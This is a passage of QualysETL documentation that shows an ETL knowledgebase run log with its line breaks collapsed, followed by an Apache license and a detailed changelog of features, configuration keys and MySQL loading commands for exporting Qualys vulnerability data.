03,909|INFO|etl_knowledgebase:20210528012603|dgregory|get_cred|username:quays93402021-05-2801:26:03,909|INFO|etl_knowledgebase:20210528012603|dgregory|get_cred|api_fqdn_server:qualysapi.qg2.apps.qualys.com412021-05-2801:26:03,909|INFO|etl_knowledgebase:20210528012603|dgregory|get_cred|**Warning:EnsureCredentialFilepermissionsarecorrectforyourcompany.422021-05-2801:26:03,909|INFO|etl_knowledgebase:20210528012603|dgregory|get_cred|**Warning:CredentialsFile:/opt/qetl/users/qualys_user/qetl_home/cred/.etld_cred.yaml432021-05-2801:26:03,909|INFO|etl_knowledgebase:20210528012603|dgregory|get_cred|**Permissionsare:-rw-------for/opt/qetl/users/qualys_user/qetl_home/cred/.etld_cred.yaml442021-05-2801:26:03,909|INFO|etl_knowledgebase:20210528012603|dgregory|knowledgebase_extract|apicall-https://qualysapi.qg2.apps.qualys.com/api/2.0/fo/knowledge_base/vuln/452021-05-2801:26:03,909|INFO|etl_knowledgebase:20210528012603|dgregory|knowledgebase_extract|apioptions-{'action':'list','details':'All','show_disabled_flag':'1','show_qid_change_log':'1','show_supported_modules_info':'1','show_pci_reasons':'1','last_modified_after':'2021-05-21T00:00:00Z'}462021-05-2801:26:03,909|INFO|etl_knowledgebase:20210528012603|dgregory|knowledgebase_extract|cookie-False472021-05-2801:26:05,717|INFO|etl_knowledgebase:20210528012603|dgregory|log_file_info|inputfile-https://qualysapi.qg2.apps.qualys.com/api/2.0/fo/knowledge_base/vuln/size:changetime:482021-05-2801:26:05,718|INFO|etl_knowledgebase:20210528012603|dgregory|log_file_info|outputfile-/opt/qetl/users/qualys_user/qetl_home/data/kb.xmlsize:728.51kilobyteschangetime:2021-05-2721:26:05localtimezone492021-05-2801:26:05,718|INFO|etl_knowledgebase:20210528012603|dgregory|knowledgebase_extract|end502021-05-2801:26:05,718|INFO|etl_knowledgebase:20210528012603|dgregory|kb_extract_wrapper|endknowledgebase_extractxmlfromqualys512021-05-2801:26:05,719|INFO|etl_knowledgebase:20210528012603|dgregory|kb_to_shelve_wrapper|startkb_shelvexmltoshelve522021-05-2801:26:05,719|INFO|etl_knowledgebase:20210528012603|dgregory|kb_to_shelve_wrapper|inputfile:/opt/qetl/users/qualys_user/qetl_home/data/kb.xml532021-05-2801:26:05,719|INFO|etl_knowledgebase:20210528012603|dgregory|kb_to_shelve_wrapper|outputfile:/opt/qetl/users/qualys_user/qetl_home/data/kb_shelve542021-05-2801:26:05,719|INFO|etl_knowledgebase:20210528012603|dgregory|kb_shelve|start552021-05-2801:26:05,744|INFO|etl_knowledgebase:20210528012603|dgregory|log_dbm_info|dbmetl_workflow_validation_type-dbm.gnu-/opt/qetl/users/qualys_user/qetl_home/data/kb_shelve562021-05-2801:26:05,815|INFO|etl_knowledgebase:20210528012603|dgregory|kb_shelve|countqualysqidaddedtoshelve:137for/opt/qetl/users/qualys_user/qetl_home/data/kb_shelve572021-05-2801:26:05,815|INFO|etl_knowledgebase:20210528012603|dgregory|log_file_info|inputfile-/opt/qetl/users/qualys_user/qetl_home/data/kb.xmlsize:728.51kilobyteschangetime:2021-05-2721:26:05localtimezone582021-05-2801:26:05,815|INFO|etl_knowledgebase:20210528012603|dgregory|log_dbm_info|dbmetl_workflow_validation_type-dbm.gnu-/opt/qetl/users/qualys_user/qetl_home/data/kb_shelve592021-05-2801:26:05,815|INFO|etl_knowledgebase:20210528012603|dgregory|log_file_info|outputfile-/opt/qetl/users/qualys_user/qetl_home/data/kb_shelvesize:632.00kilobyteschangetime:2021-05-2721:26:05localtimezone602021-05-2801:26:05,815|INFO|etl_knowledgebase:20210528012603|dgregory|kb_shelve|end612021-05-2801:26:05,815|INFO|etl_knowledgebase:20210528012603|dgregory|kb_to_shelve_wrapper|endkb_shelvexmltoshelve622021-05-2801:26:05,815|INFO|etl_knowledgebase:20210528012603|dgregory|kb_to_json_wrapper|startkb_load_jsontransformShelvetoJSON632021-05-2801:26:05,815|INFO|etl_knowledgebase:20210528012603|dgregory|kb_to_json_wrapper|inputfile:/opt/qetl/users/qualys_user/qetl_home/data/kb_shelve642021-05-2801:26:05,815|INFO|etl_knowledgebase:20210528012603|dgregory|kb_to_json_wrapper|outputFile:/opt/qetl/users/qualys_user/qetl_home/data/kb.json652021-05-2801:26:05,815|INFO|etl_knowledgebase:20210528012603|dgregory|kb_load_json|start662021-05-2801:26:05,840|INFO|etl_knowledgebase:20210528012603|dgregory|kb_load_json|countqidloadedtojson:137672021-05-2801:26:05,841|INFO|etl_knowledgebase:20210528012603|dgregory|log_file_info|inputfile-/opt/qetl/users/qualys_user/qetl_home/data/kb_shelvesize:632.00kilobyteschangetime:2021-05-2721:26:05localtimezone682021-05-2801:26:05,841|INFO|etl_knowledgebase:20210528012603|dgregory|log_dbm_info|dbmetl_workflow_validation_type-dbm.gnu-/opt/qetl/users/qualys_user/qetl_home/data/kb_shelve692021-05-2801:26:05,841|INFO|etl_knowledgebase:20210528012603|dgregory|log_file_info|outputfile-/opt/qetl/users/qualys_user/qetl_home/data/kb.jsonsize:645.81kilobyteschangetime:2021-05-2721:26:05localtimezone702021-05-2801:26:05,841|INFO|etl_knowledgebase:20210528012603|dgregory|kb_load_json|end712021-05-2801:26:05,841|INFO|etl_knowledgebase:20210528012603|dgregory|kb_to_json_wrapper|endkb_load_jsontransformShelvetoJSON722021-05-2801:26:05,841|INFO|etl_knowledgebase:20210528012603|dgregory|kb_to_csv_wrapper|startkb_load_csv-shelvetocsv732021-05-2801:26:05,841|INFO|etl_knowledgebase:20210528012603|dgregory|kb_to_csv_wrapper|inputfile:/opt/qetl/users/qualys_user/qetl_home/data/kb_shelve742021-05-2801:26:05,841|INFO|etl_knowledgebase:20210528012603|dgregory|kb_to_csv_wrapper|outputfile:/opt/qetl/users/qualys_user/qetl_home/data/kb.csv752021-05-2801:26:05,841|INFO|etl_knowledgebase:20210528012603|dgregory|kb_to_csv_wrapper|outputfile:/opt/qetl/users/qualys_user/qetl_home/data/kb_cve_qid_map.csvcve->qidmapincsvformat762021-05-2801:26:05,841|INFO|etl_knowledgebase:20210528012603|dgregory|kb_create_csv_from_shelve|start772021-05-2801:26:05,864|INFO|etl_knowledgebase:20210528012603|dgregory|kb_create_csv_from_shelve|countrowswrittentocsv:137782021-05-2801:26:05,864|INFO|etl_knowledgebase:20210528012603|dgregory|log_file_info|inputfile-/opt/qetl/users/qualys_user/qetl_home/data/kb_shelvesize:632.00kilobyteschangetime:2021-05-2721:26:05localtimezone792021-05-2801:26:05,864|INFO|etl_knowledgebase:20210528012603|dgregory|log_dbm_info|dbmetl_workflow_validation_type-dbm.gnu-/opt/qetl/users/qualys_user/qetl_home/data/kb_shelve802021-05-2801:26:05,864|INFO|etl_knowledgebase:20210528012603|dgregory|log_file_info|outputfile-/opt/qetl/users/qualys_user/qetl_home/data/kb.csvsize:387.65kilobyteschangetime:2021-05-2721:26:05localtimezone812021-05-2801:26:05,864|INFO|etl_knowledgebase:20210528012603|dgregory|kb_create_csv_from_shelve|end822021-05-2801:26:05,867|INFO|etl_knowledgebase:20210528012603|dgregory|kb_create_cve_qid_shelve|countrowswrittentocvetoqidshelve:334832021-05-2801:26:05,868|INFO|etl_knowledgebase:20210528012603|dgregory|log_file_info|inputfile-/opt/qetl/users/qualys_user/qetl_home/data/kb_shelvesize:632.00kilobyteschangetime:2021-05-2721:26:05localtimezone842021-05-2801:26:05,868|INFO|etl_knowledgebase:20210528012603|dgregory|log_dbm_info|dbmetl_workflow_validation_type-dbm.gnu-/opt/qetl/users/qualys_user/qetl_home/data/kb_shelve852021-05-2801:26:05,868|INFO|etl_knowledgebase:20210528012603|dgregory|log_file_info|outputfile-/opt/qetl/users/qualys_user/qetl_home/data/kb_cve_qid_map_shelvesize:44.00kilobyteschangetime:2021-05-2721:26:05localtimezone862021-05-2801:26:05,868|INFO|etl_knowledgebase:20210528012603|dgregory|kb_to_csv_wrapper|endkb_load_csv-shelvetocsv872021-05-2801:26:05,868|INFO|etl_knowledgebase:20210528012603|dgregory|kb_to_cve_qid_csv_wrapper|startkb_load_cve_qid_csvtransformShelvetoCSV882021-05-2801:26:05,868|INFO|etl_knowledgebase:20210528012603|dgregory|kb_to_cve_qid_csv_wrapper|inputfile:/opt/qetl/users/qualys_user/qetl_home/data/kb_cve_qid_map_shelve892021-05-2801:26:05,868|INFO|etl_knowledgebase:20210528012603|dgregory|kb_to_cve_qid_csv_wrapper|outputfile:/opt/qetl/users/qualys_user/qetl_home/data/kb_cve_qid_map.csv902021-05-2801:26:05,868|INFO|etl_knowledgebase:20210528012603|dgregory|kb_cve_qid_csv_report|Start912021-05-2801:26:05,869|INFO|etl_knowledgebase:20210528012603|dgregory|kb_cve_qid_csv_report|CountofCVErowswritten:334922021-05-2801:26:05,869|INFO|etl_knowledgebase:20210528012603|dgregory|kb_cve_qid_csv_report|End932021-05-2801:26:05,869|INFO|etl_knowledgebase:20210528012603|dgregory|kb_to_cve_qid_csv_wrapper|endkb_load_cve_qid_csvtransformShelvetoCSV942021-05-2801:26:05,869|INFO|etl_knowledgebase:20210528012603|dgregory|kb_to_sqlite_wrapper|startkb_load_sqlitetransformShelvetoSqlite3DB952021-05-2801:26:05,869|INFO|etl_knowledgebase:20210528012603|dgregory|kb_to_sqlite_wrapper|inputfile:/opt/qetl/users/qualys_user/qetl_home/data/kb.csv962021-05-2801:26:05,869|INFO|etl_knowledgebase:20210528012603|dgregory|kb_to_sqlite_wrapper|outputfile:/opt/qetl/users/qualys_user/qetl_home/data/kb_load_sqlite.db972021-05-2801:26:05,869|INFO|etl_knowledgebase:20210528012603|dgregory|kb_load_sqlite|start982021-05-2801:26:05,884|INFO|etl_knowledgebase:20210528012603|dgregory|bulk_insert_csv_file|Countrowsaddedtotable:137992021-05-2801:26:05,884|INFO|etl_knowledgebase:20210528012603|dgregory|log_file_info|inputfile-/opt/qetl/users/qualys_user/qetl_home/data/kb.csvsize:387.65kilobyteschangetime:2021-05-2721:26:05localtimezone1002021-05-2801:26:05,884|INFO|etl_knowledgebase:20210528012603|dgregory|log_file_info|outputfile-/opt/qetl/users/qualys_user/qetl_home/data/kb_load_sqlite.dbsize:520.00kilobyteschangetime:2021-05-2721:26:05localtimezone1012021-05-2801:26:05,884|INFO|etl_knowledgebase:20210528012603|dgregory|kb_load_sqlite|end1022021-05-2801:26:05,884|INFO|etl_knowledgebase:20210528012603|dgregory|kb_to_sqlite_wrapper|endkb_load_sqlitetransformShelvetoSqlite3DB1032021-05-2801:26:05,884|INFO|etl_knowledgebase:20210528012603|dgregory|kb_distribution_wrapper|startkb_distribution1042021-05-2801:26:05,884|INFO|etl_knowledgebase:20210528012603|dgregory|kb_dist|start1052021-05-2801:26:05,884|INFO|etl_knowledgebase:20210528012603|dgregory|copy_results_to_external_target|noactionstaken.etld_config_settings.yamlkb_export_dirsetto:default1062021-05-2801:26:05,885|INFO|etl_knowledgebase:20210528012603|dgregory|kb_dist|end1072021-05-2801:26:05,885|INFO|etl_knowledgebase:20210528012603|dgregory|kb_distribution_wrapper|endkb_distribution1082021-05-2801:26:05,885|INFO|etl_knowledgebase:20210528012603|dgregory|kb_end_wrapper|runtimeforkb_etl_workflowinseconds:1.97808016699855221092021-05-2801:26:05,885|INFO|etl_knowledgebase:20210528012603|dgregory|kb_end_wrapper|__end__kb_etl_workflow['/home/dgregory/opt/qetl/qetl_venv/bin/qetl_manage_user','-u','/opt/qetl/users/qualys_user','-e','etl_knowledgebase: 20210528012603']Review ETL KnowledgeBase Data(qetl_venv)qualysetl@ubuntu:/opt/qetl/users/qualys_user/qetl_home/data$cd/opt/qetl/users/qualys_user/qetl_home/data/(qetl_venv)qualysetl@ubuntu:/opt/qetl/users/qualys_user/qetl_home/data$lskb_sqlite.dbknowledgebase_extract_dir1kb_sqlite.db2kb_utc_run_datetime_2022-01-13T07:29:49Z_utc_last_modified_after_2021-12-14T00:00:00Z_batch_000001.json.gz3kb_utc_run_datetime_2022-01-13T07:29:49Z_utc_last_modified_after_2021-12-14T00:00:00Z_batch_000001.xml.gzLicenseApache LicenseCopyright 2021 David Gregory and Qualys Inc.\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.ChangeLogBeginning with 0.6.98 a change log will be maintained here.Version | Date of Change | Description of Changes\n------- | -------------- | ----------------------\n0.6.98 | 2021-08-06 10:00 ET | minor update to order of python virtual env package install. Install Script: qetl_setup_python_venv\n0.6.99 | 2021-08-06 11:30 ET | minor update, added module chardet.\n0.6.100 | 2021-08-10 12:00 ET | minor documentation update.\n0.6.101 | 2021-08-11 12:00 ET | minor update to asset_inventory gateway selection.\n0.6.102 | 2021-08-13 12:00 ET | minor update to documentation.\n0.6.103 | 2021-08-26 18:00 ET | minor update to allow host list detection to continue to run for up to 1 day.\n0.6.104 | 2021-08-27 18:00 ET | update to address encoding error in complex data.\n0.6.105 | 2021-09-09 12:00 ET | updated roadmap, and updated retry after receiving 409 (concurrency) or 202 (duplicate operation), sleep 2 min and retry.\n0.6.106 | 2021-09-29 12:00 ET | Minor update to allow sqlite 3.26.\n0.6.107 | 2021-09-29 20:00 ET | Minor update to adding ability to show tags in Host List. If host_list_show_tags: '1' is added to etld_config_settings.yaml, then the host list will include qualys tags.\n0.6.108 | 2021-10-01 20:00 ET | Updated documentation to include Red Hat 8.4 instructions.\n0.6.109 | 2021-10-02 12:00 ET | Updated documentation to include Asset Inventory (GAV/CSAM V2) API.\n0.6.112 | 2021-11-07 12:00 ET | Updated etl_asset_inventory to include new fields: criticality, businessInformation, assignedLocation, businessAppListData. Updated retry and program max run time sanity checks. Updated Asset Inventory Logging to include count of assets prior to executing download. Updated Host List to include cloud meta data. \n0.6.113 | 2021-11-16 12:00 ET | Updated file change sanity check to 20 min of inactivity.\n0.6.117 | 2021-11-18 06:00 ET | Updated http wait time from 30 sec to 5 min. Added counters to asset inventory csv logging. Reverse Sort to add newest assets to shelve in asset_inventory_shelve without overwriting dups.\n0.6.118 | 2021-11-18 06:00 ET | Updated performance reading shelve database in asset inventory process. Tested 1.5 Million hosts successfully.\n0.6.119 | 2021-11-24 06:00 ET | Updated asset inventory features to include presenting JSON in csv cells instead of indexed list, as well as feature to not truncate data. To enable these feature, edit your etld_config_settings.yaml to include 'asset_inventory_present_csv_cell_as_json: True' and edit your etld_config_settings.yaml to include: asset_inventory_csv_truncate_cell_limit: False\n0.6.123 | 2021-12-01 19:00 ET | Part 1) Updated asset inventory features to include tables Q_Asset_Inventory_Software_Assetid (Asset ID to Software) and Q_Asset_Inventory_Software_Unique ( unique list of software and lifecycle info found in asset inventory ). These tables are useful to create views of unique software, unique software -> server.\n0.6.123 | 2021-12-01 19:00 ET | Part 2) Updated qetl_manage_user credential handling to support -p prompt for cred, -s accept json creds from stdin, -m accept creds exported to environment. \n0.6.124 | 2021-12-02 09:00 ET | Minor update to improve exception handling in extract \n0.6.126 | 2021-12-04 19:00 ET | Minor update to help and version options for qetl_manage_user \n0.6.130 | 2021-12-09 12:00 ET | Part 1) Added feature present JSON in csv cells to etl_knowledgebase, etl_host_list, etl_host_list_detection, etl_asset_inventory. To enable these feature, edit your etld_config_settings.yaml to include 'kb_present_csv_cell_as_json: True', 'host_list_present_csv_cell_as_json: True' 'host_list_detection_present_csv_cell_as_json: True', 'asset_inventory_present_csv_cell_as_json: True' \n0.6.130 | 2021-12-09 12:00 ET | Part 2) Added feature \"no truncation\" if truncate cell limit is 0 in etl_knowledgebase, etl_host_list, etl_host_list_detection, etl_asset_inventory. To enable this feature, edit your etld_config_settings.yaml to update: 'asset_inventory_csv_truncate_cell_limit: 0' 'kb_csv_truncate_cell_limit: 0' 'host_list_csv_truncate_cell_limit: 0' 'host_list_detection_csv_truncate_cell_limit: 0'. \n0.6.130 | 2021-12-09 12:00 ET | Part 3) Added feature to allow customers in development to set Python3 requests verify=False. This setting is not recommended as it can result in a man-in-the-middle (MitM) attack. To enable Python3 requests verify=False, edit your etld_config_settings.yaml and add the setting 'requests_module_tls_verify_status: False'. Default is True. When set to False logging will include warning messages about insecurity of the setting. We recommend repairing certificate chain instead of setting this option to False. Defaults to True, requiring requests to verify the TLS certificate at the remote end. If verify is set to False, requests will accept any TLS certificate presented by the server, and will ignore hostname mismatches and/or expired certificates, which will make your application vulnerable to man-in-the-middle (MitM) attacks. Only set this to False for testing. \n0.6.130 | 2021-12-09 12:00 ET | Part 4) Minor updates to improve progress counters in logging, minor update to asset inventory logging to include batch number. \n0.6.131 | 2021-12-09 13:00 ET | Minor updates to formatting of ReadMe.\n0.7.6 | 2022-01-12 16:00 ET | Begin 0.7.x series to include major update in performance and updates to db schemas. See below for changes. Please test before replacing 0.6.x series.\n0.7.6 | 2022-01-12 16:00 ET | changes to 0.7.x series: 1) All extract data is loaded into their respective extract directories. knowledgebase_extract_dir, host_list_extract_dir, host_list_detection_extract_dir, asset_inventory_extract_dir. All files are gzip compressed.\n0.7.6 | 2022-01-12 16:00 ET | changes to 0.7.x series: 2) CSV Files are no longer auto generated. use sqlite3 -csv -header sqlite_file.db \"select * from TABLE_NAME\" > OUTPUTFILE.csv to generate your csv files post process.\n0.7.6 | 2022-01-12 16:00 ET | changes to 0.7.x series: 3) All xml files are converted to json files in their respective extract directories.\n0.7.6 | 2022-01-12 16:00 ET | changes to 0.7.x series: 4) host_list_detection_sqlite.db schema has been updated. Please review tables to create the views of data you require. Q_Host_List_Detection is now a view of Q_Host_List, Q_Host_List_Detection_HOSTS, and Q_Host_List_Detection_QIDS. Each field in view Q_Host_List_Detection is prefixed with the source of their data ( HL_ = Q_Host_List, HLDH_ = Q_Host_List_Detection_Hosts, HLDQ_ = Q_Host_List_Detection_QIDS. host_list_detection_sqlite.db can be used to update a central database of all historical data post process. \n0.7.6 | 2022-01-12 16:00 ET | changes to 0.7.x series: 5) host_list_sqlite.db schema has been updated. Please review tables to create the views of data you require.\n0.7.6 | 2022-01-12 16:00 ET | changes to 0.7.x series: 6) kb_load_sqlite.db has been renamed kb_sqlite.db\n0.7.6 | 2022-01-12 16:00 ET | changes to 0.7.x series: 7) kb_sqlite.db schema has been updated. Please review tables to create the views of data you require.\n0.7.6 | 2022-01-12 16:00 ET | changes to 0.7.x series: 8) asset_inventory_sqlite.db schema has been updated. Please review tables to create the views of data you require.\n0.7.6 | 2022-01-12 16:00 ET | changes to 0.7.x series: 9) -e etl_test_system will execute a sampling of all etl programs with the resulting log in log/test_system.log. ERRORS in this log indicate an unhealthy system.\n0.7.6 | 2022-01-12 16:00 ET | changes to 0.7.x series: 10) There is no csv cell truncation as all csv cells with nested data are now json objects instead of flat lists. \n0.7.6 | 2022-01-12 16:00 ET | changes to 0.7.x series: 11) A new CVE view of knowledgebase is available Q_KnowledgeBase_CVE_LIST.\n0.7.7 | 2022-01-13 10:00 ET | Minor updates to test_system to get 75 hosts.\n0.7.8 | 2022-01-13 15:00 ET | Minor updates to documenation prior to pypi.org launch.\n0.7.9 | 2022-01-14 15:00 ET | Minor updates to documenation.\n0.7.10 | 2022-01-15 02:00 ET | Update to asset inventory workflow to optimize data load.\n0.7.11 | 2022-01-15 14:00 ET | Q_Knowledgebase_CVE_LIST view bug fix.\n0.7.13 | 2022-01-20 19:00 ET | Update to allow for test or prod install of specific qualysetl version. Also, improvements in exception processing across modules and preliminary work on WAS.\n0.7.14 | 2022-01-21 09:00 ET | Updated etl_asset_inventory to ensure gzip compression is default. Update documentation from Red Hat 8.4 to Red Hat 8.5 which is the current 8.x series of Red Hat.\n0.7.15 | 2022-01-21 09:00 ET | Updated help documentation for qetl_setup_python_venv.\n0.7.16 | 2022-02-09 15:00 ET | Updated etl_asset_inventory for GAV only customer processing.\n0.7.17 | 2022-03-25 12:00 ET | Updated etl_asset_inventory enhancements to retry exception processing for malformed json and http error codes.\n0.7.18 | 2022-03-25 12:00 ET | Updated Roadmap\n0.7.19 | 2022-03-26 12:00 ET | Updated retry limits for etl_asset_inventory.\n0.7.20 | 2022-03-27 15:00 ET | Updated etl_asset_inventory auth token refresh.\n0.7.40 | 2022-08-02 18:00 ET | Updated etl_asset_inventory auth token refresh for edge case during maintenance window (http 503). Also, updated Road Map.\n0.7.40 | 2022-08-02 18:00 ET | Updated http_conn_timeout default for all modules to address long running queries.\n0.7.40 | 2022-08-02 18:00 ET | Updated Host List to include ASSET_RISK_SCORE, ASSET_CRITICALITY_SCORE, ARS_FACTORS. Edit etld_config_settings.yaml to include: host_list_payload_option: {'show_ars': '1', 'show_ars_factors': '1'} to enable capturing data. Your subscription must have ARS enabled. Contact your TAM and dgregory@qualys.com if this option does not work for you.\n0.7.40 | 2022-08-02 18:00 ET | Updated Host List Detection to include QDS, QDS_FACTORS Edit etld_config_settings.yaml to include: host_list_detection_payload_option: {'show_qds': '1', 'show_qds_factors': '1'} to enable capturing data. Your subscription must have ARS enabled. Contact your TAM and dgregory@qualys.com if this option does not work for you.\n0.7.41 | 2022-08-30 18:00 ET | Updated Host List Detection to enable host_list_detection_multi_proc_batch_size for values less than 2000 hosts.\n0.7.42 | 2022-08-31 06:00 ET | Updated ulimit for open files to accomdate multiprocessing pipes in host list detection for large jobs.\n0.7.44 | 2022-08-31 11:00 ET | Updated to ensure root user cannot install or execute qualysetl \n0.7.45 | 2022-08-31 21:00 ET | Documention Updates - Asset Inventory Schema Image along with removing old comments from etld_config_settings.yaml template.\n0.7.46 | 2022-09-01 16:00 ET | Add ram, disk, swap, cpu info to logging at beginning of job. \n0.7.47 | 2022-09-02 09:00 ET | Add SYS stat for ram, disk, swap, cpu to logging throughout job run. \n0.7.48 | 2022-09-18 09:00 ET | GAV/CSAM Fields added to SQL Database - domainRole,riskScore,passiveSensor,domain,subdomain,whois,isp,asn. \n0.7.48 | 2022-09-18 09:00 ET | GAV/CSAM Documentation of Schema updated with additional fields added to SQL Database: domainRole,riskScore,passiveSensor,domain,subdomain,whois,isp,asn\n0.7.48 | 2022-09-18 09:00 ET | Host List Detection Documentation of Schema updated with additional fields added to SQL Database - Q_Host_List: ASSET_RISK_SCORE, ASSET_CRITICALITY_SCORE, ARS_FACTORS\n0.7.48 | 2022-09-18 09:00 ET | Host List Detection Documentation of Schema updated with additional fields added to SQL Database - Q_Host_List_Detection_QIDS: QDS, QDS_FACTORS\n0.7.49 | 2022-09-19 03:00 ET | Documentation Update minor.\n0.7.50 | 2022-09-19 04:00 ET | Documentation Update minor.\n0.7.51 | 2022-10-05 15:00 ET | Added update to counters in logs, added retest if gateway 401 encountered.\n0.7.56 | 2022-11-04 05:00 ET | Added -e etl_was to qetl_manage_user options to extract WAS Applications, Findings and Catalog.\n0.7.56 | 2022-11-04 05:00 ET | Updated STATUS_TABLE for all modules. STATUS_COUNT renamed LAST_BATCH_PROCESSED, STATUS_DETAILS json updated to include details of which etl workflow updated the table along with workflow log timestamp to correlate the logs with the database update.\n0.7.56 | 2022-11-04 05:00 ET | Updated base64 routine to correct error when processing complex passwords.\n0.8.00 | 2022-12-05 05:00 ET | Major update, be sure to test before going to production.\n0.8.00 | 2022-12-05 05:00 ET | Updates: 1) qetl_manage_user -e etl_was has been added to provide you with Web Application Scanning data including WebApps, Findings and Catalog.\n0.8.00 | 2022-12-05 05:00 ET | Updates: 2) qetl_manage_user -e validate_etl_[etl name] will scan etl_[etl_name] log for errors and report success or fail.\n0.8.00 | 2022-12-05 05:00 ET | Updates: - Example: qetl_manage_user -u /opt/qetl/users/youruser -e validate_etl_host_list_detection\n0.8.00 | 2022-12-05 05:00 ET | Updates: - Example: qetl_manage_user -u /opt/qetl/users/youruser -e validate_etl_asset_inventory\n0.8.00 | 2022-12-05 05:00 ET | Updates: - Example: qetl_manage_user -u /opt/qetl/users/youruser -e validate_etl_was\n0.8.00 | 2022-12-05 05:00 ET | Updates: 3) qetl_manage_user -i -u /opt/qetl/users/[your new qetl user] will automatically initialize user directory without prompting. This is useful when automating run of QualysETL on new systems/docker images as no prompts are provided.\n0.8.00 | 2022-12-05 05:00 ET | Updates: - Example: qetl_manage_user -i -u /opt/qetl/users/testuser will automatically create the -u directory structure without prompting. \n0.8.00 | 2022-12-05 05:00 ET | Updates: 4) distribution - when enabled, all tables from ETL are prepared for database load.\n0.8.00 | 2022-12-05 05:00 ET | Updates: Edit etld_config_settings.yaml adding the following keys:\n0.8.00 | 2022-12-05 05:00 ET | Updates: - kb_distribution_csv_flag: True\n0.8.00 | 2022-12-05 05:00 ET | Updates: - host_list_distribution_csv_flag: True\n0.8.00 | 2022-12-05 05:00 ET | Updates: - host_list_detection_distribution_csv_flag: True\n0.8.00 | 2022-12-05 05:00 ET | Updates: - asset_inventory_distribution_csv_flag: True\n0.8.00 | 2022-12-05 05:00 ET | Updates: - was_distribution_csv_flag: True\n0.8.00 | 2022-12-05 05:00 ET | Updates: Tested with the following MySQL options:\n0.8.00 | 2022-12-05 05:00 ET | Updates: - Bash Script Example: \n0.8.00 | 2022-12-05 05:00 ET | Updates: - export TABLE_NAME=QETL.Q_KnowledgeBase\n0.8.00 | 2022-12-05 05:00 ET | Updates: - zcat [Q_KnowledgeBase.*.csv.gz] | mysql -v -e \"LOAD DATA LOCAL INFILE '/dev/stdin' INTO TABLE ${TABLE_NAME} CHARACTER SET UTF8 FIELDS TERMINATED BY ',' ESCAPED BY '\\\\\\\\' LINES TERMINATED BY '\\\\n';COMMIT;\"\n0.8.00 | 2022-12-05 05:00 ET | Updates: The default max_size for each field in distribution is 1000000 characters. To adjust this to meet your database field limits, edit etld_config_settings.yaml and add the following key/value pairs for each etl you want to customize max_field size for in distribution files.\n0.8.00 | 2022-12-05 05:00 ET | Updates: - kb_distribution_csv_max_field_size: 2000000 \n0.8.00 | 2022-12-05 05:00 ET | Updates: - host_list_distribution_csv_max_field_size: 2000000\n0.8.00 | 2022-12-05 05:00 ET | Updates: - host_list_detection_distribution_csv_max_field_size: 2000000\n0.8.00 | 2022-12-05 05:00 ET | Updates: - asset_inventory_distribution_csv_max_field_size: 2000000\n0.8.00 | 2022-12-05 05:00 ET | Updates: - was_distribution_csv_max_field_size: 2000000\n0.8.00 | 2022-12-05 05:00 ET | Updates: For long running jobs etl_host_list_detection and etl_asset_inventory, these both generate distribution files through multiprocessing, so files are prepared for downstream ingestion as they are read from Qualys.\n0.8.00 | 2022-12-05 05:00 ET | Updates: - Use this feature to immediately begin streaming Qualys data to your downstream system by inserting distribution files into your downstream system as each batch is created.\n0.8.00 | 2022-12-05 05:00 ET | Updates: - Each distribution file is the product of integrity testing and load to SQLite prior exporting to distribution batch file for downstream processing..\n0.8.00 | 2022-12-05 05:00 ET | Updates: 5) BATCH_DATE, BATCH_NUMBER added to Q_Asset_Inventory for tracability back to original batch json data used for loading table\n0.8.00 | 2022-12-05 05:00 ET | Updates: 6) BATCH_NUMBER should always be stored as a text field.\n0.8.00 | 2022-12-05 05:00 ET | Updates: 7) Removed Q_Host_List_Detection view. Table Views can be injected into database post process to meet customer requirements.\n0.8.01 | 2022-12-06 05:00 ET | Minor Documentation Updates.\n0.8.02 | 2022-12-06 05:00 ET | Minor Documentation Updates.\n0.8.05 | 2022-12-06 05:00 ET | Updated to allow for csv quoting and dialect customization. The following are defaults that can be adjusted in etld_config_settings.yaml.\n0.8.05 | 2022-12-09 05:00 ET | csv_distribution_python_csv_quoting = 'csv.QUOTE_NONE'\n0.8.05 | 2022-12-09 05:00 ET | csv_distribution_python_csv_dialect_delimiter = '\\t'\n0.8.05 | 2022-12-09 05:00 ET | csv_distribution_python_csv_dialect_doublequote = False\n0.8.05 | 2022-12-09 05:00 ET | csv_distribution_python_csv_dialect_escapechar = '\\'\n0.8.05 | 2022-12-09 05:00 ET | csv_distribution_python_csv_dialect_lineterminator = '\\n'\n0.8.05 | 2022-12-09 05:00 ET | csv_distribution_python_csv_dialect_quotechar = None\n0.8.05 | 2022-12-09 05:00 ET | csv_distribution_python_csv_dialect_skipinitialspace = False\n0.8.05 | 2022-12-09 05:00 ET | csv_distribution_python_csv_dialect_strict = False\n0.8.05 | 2022-12-09 05:00 ET | The csv_distribution_python options above are tested with mysql load options in bash shell:\n0.8.05 | 2022-12-09 05:00 ET | zcat [table file].csv.gz | mysql $PORT_OPT -v -e \"LOAD DATA LOCAL INFILE '/dev/stdin' INTO TABLE ${TABLE_NAME} CHARACTER SET UTF8 FIELDS TERMINATED BY '\\\\t' ESCAPED BY '\\\\\\\\' LINES TERMINATED BY '\\\\n';\"\n0.8.05 | 2022-12-09 05:00 ET | SEE Log for options that are selected for your csv_distribution run to validate the options meet your needs.\n0.8.10 | 2022-12-16 09:00 ET | Internal enhancements to authentication, replacing etld_lib_credentials with etld_lib_authentication_objects.\n0.8.10 | 2022-12-16 09:00 ET | Added etld_config_settings.yaml option was_catalog_start_greater_than_last_id=[ID NUM], resulting in pulling only catalog entries greater_than_last_id entered.\n0.8.10 | 2022-12-16 09:00 ET | Added transform to asset inventory table, from sensor json, new table fields: \"sensor_lastPcScanDateAgent\", \"sensor_lastPcScanDateScanner\", \"sensor_lastVmScanDateAgent\", \"sensor_lastVmScanDateScanner\" added to SQLite Schema.\n0.8.11 | 2022-12-20 14:00 ET | Updated first time setup of user to allow for updating user/password from template.\n0.8.14 | 2023-01-23 09:00 ET | Updated WAS to iterate / include over 1000 findings in a web application.\n0.8.20 | 2023-08-08 23:00 ET | Added experimental support for Host List Detection ASSET_CVE field. Contact your Technical Account Manager and David Gregory to enable ASSET_CVE. See [QWEB 10.23 release notification for 